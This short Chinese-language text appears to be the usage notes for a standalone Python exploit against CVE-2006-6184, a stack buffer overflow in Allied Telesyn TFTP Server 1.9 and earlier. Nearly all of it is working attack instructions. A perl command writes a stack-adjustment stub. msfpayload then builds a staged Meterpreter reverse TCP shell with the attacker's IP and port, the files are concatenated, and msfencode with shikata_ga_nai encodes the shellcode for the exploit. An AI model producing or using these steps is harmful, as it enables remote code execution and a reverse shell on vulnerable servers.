这是一个基于Python的独立利用程序,针对CVE-2006-6184漏洞。该利用程序触发了Allied Telesyn TFTP Server (AT-TFTP) 1.9及更早版本中的基于栈的缓冲区溢出,允许远程攻击者造成拒绝服务或执行任意代码。
你不会觉得这么简单吧? 有效载荷必须自定义,包含你自己的IP地址和监听端口,所以你需要自行生成。 请按以下步骤操作:
1.) 输入以下命令创建一个十六进制文件,该文件包含需要从栈指针中减去的量(3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) 接下来,使用以下命令创建一个阶段性的meterpreter shell有效载荷:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[你的IP] LPORT=[你的端口] R > payload
3.) 然后,合并你刚刚创建的两个文件:
cat stackadj payload > shellcode
4.) 最后,让我们消除坏字符:
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
将输出结果作为"payload"变量的值。